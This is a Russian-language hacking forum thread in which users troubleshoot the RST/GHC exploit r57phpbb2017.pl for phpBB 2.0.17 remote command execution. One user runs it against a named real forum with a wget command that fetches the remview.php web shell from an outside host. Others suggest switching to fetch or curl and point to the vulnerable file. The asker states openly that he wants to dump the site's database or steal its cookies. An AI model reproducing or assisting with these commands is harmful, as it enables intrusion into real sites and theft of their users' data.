так этож уязвимость представляет собой php injection
так что базу слить канечно можно в любом случае, вот шел записать только если прав хватит, логично?
не в тему но всеже скажу
хреновый канечно у нас FAQ по phpbb чисто реклама рст, ни какой информативности мля
кстати еще от себя скажу что странно вроде там php 5.1 а GLOBALS через GET всеравно работает.

какой командой можно базу слить?
или шел залить

может я просто не так делаю не ругайтесь


C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ тут_команда

или это делается пл другому?

А команда простая wget http://путь_к шелу.
И он зальётся.

C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/

попробуй без сплоита делать тогда быстрее во всем разберешся

какким образом ? объясни пожалуйста. Мне просто у этого форума куки нужно выдрать или базу. Вобщем получить достут можно даже без админки.

А может там wget нету а чтото другое и шел не залился.Попробуй вместо wget fetch ili curl вставить.

вот здесь
http://www.hardened-php.net/advisory_172005.75.html
первое описание баги челом который её нашел, к томуже подскажу что вся фишка в файле
includes/usercp_register.php

эффект тот же ни чего не происходит как будто что то не так делаю